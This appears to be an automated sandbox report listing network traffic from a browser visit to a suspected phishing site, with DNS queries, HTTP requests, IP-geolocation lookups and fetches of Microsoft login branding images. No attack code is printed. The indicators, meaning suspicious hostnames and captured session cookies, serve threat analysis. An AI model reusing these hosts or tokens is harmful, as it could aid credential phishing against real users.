Source: global traffic	HTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 HTTP/1.1Host: s3irk.ativens.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBVclJaQVlFbDN1TFJWVVNEMVk0eGc9PSIsInZhbHVlIjoiZStZajJPUkRoMld0SCtsck5VQU12ZUlSQmxjWGtpMW1qNDdzSXZRbDJRYU5mekpVK1BWcnY5amxJcnQrQzErMzZKK2pBR2FiaFI3ekhyOUlISDQxSGM3UlI2a1o1ckxPYks5dG9mTjZoQ3MzQ1p4U3MzZ0ZBTXI2T3JSOEhvZ2ciLCJtYWMiOiI3NDQ4MjRlNWQ5NjY3MGQwMTA1Y2NhYWY0NGQxMGYyODdlYzk4MWI0OTg3NWI2OGJlYjFmMjA3MzViNGE4YzM2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJhdlh1anpmNWN2eTFaVXJXYjJvVWc9PSIsInZhbHVlIjoiNktDUnJKQWY1emd4YXFWSDdyMlNzNnQ1YytGa2pkZXM4V0ZWd0lrdzZoa3pmWWFRVUZSMlFVeXBjKytIcXR2MHZoY0drK29relBRNFNKWVY4QThZenNhb2FwdXJwMlJxUzlaaFVkUmlCcGNWbC9tcnlOajVydHM4S0JJQkk5ZFkiLCJtYWMiOiJjNmVlNTk0NGEzMTY4OWRlNWQyYWJmMDg4MmQwZGY5M2EzNWU2NmU1OWMxOTExZjQ0NzhiNmZmODE5OWY0ZjgxIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.itanhangasaude.com.br
Source: global traffic	DNS traffic detected: DNS query: vkwek.ckyucle.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: nzd92.6gniu68.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: ipapi.co
Source: global traffic	DNS traffic detected: DNS query: s3irk.ativens.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msauthimages.net

Source: unknown

HTTP traffic detected: POST /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 428Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1348Server: cloudflareCF-RAY: 89d53a5f9edd8c23-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2QCk5lnmg/Vz5+Leh/mNbA==$wGqH3Wj9xaw/mcXiawA9wA==Server: cloudflareCF-RAY: 89d53a8feab28c47-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: dz1z/F5Y/H+JvFOJLnjQBg==$4H114BBoHY4JTvNfzKIetg==Server: cloudflareCF-RAY: 89d53aab4c9e728a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: bnqcWyO0I0VHDQ3UvW45pA==$c7sV2ixOd2+Gu37NSWq2EQ==Server: cloudflareCF-RAY: 89d53b16392d0f39-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2XypR95Qs7VWdniFUiARnjZ44B9gUvUfBVwLe4MpOYwxw4ib2rjoDCKiWeXOu8bdIEFyOxSpEu4wlwqHJFE6jmg3VyGvkB0%2FYfJuE9w7IHxEVE5Ayhduj9KpAsk5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b1cc895428e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNr7K31YxCybawgO8UcrvC9KOG8x01hj10z4d6VsyJz8tdqSzuEzr2ucdsLTt4o9vVVqnxpyXDz3viB292rO%2Bl2gk1mmsmQNNxMEte%2FgZ9AQMb3D4NGU2dlpMIR%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b3eafe68c36-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:12 GMTContent-Type: application/json; charset=utf-8Content-Length: 155Connection: closevary: OriginCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d53b593c4fc411-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b5f5a3843b8-EWR

Source: chromecache_118.2.dr	String found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
Source: chromecache_126.2.dr	String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_126.2.dr	String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_118.2.dr	String found in binary or memory: https://github.com/fent)
Source: chromecache_126.2.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_126.2.dr	String found in binary or memory: https://recaptcha.net
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_123.2.dr	String found in binary or memory: https://vkwek.ckyucle.com/2DUx/#-
Source: chromecache_126.2.dr	String found in binary or memory: https://www.apache.org/licenses/
Source: chromecache_126.2.dr, chromecache_121.2.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/
Source: chromecache_126.2.dr	String found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.
Source: chromecache_121.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 62974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 62922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62953
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62959
Source: unknown	Network traffic detected: HTTP traffic on port 62916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 62968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62956 -> 443
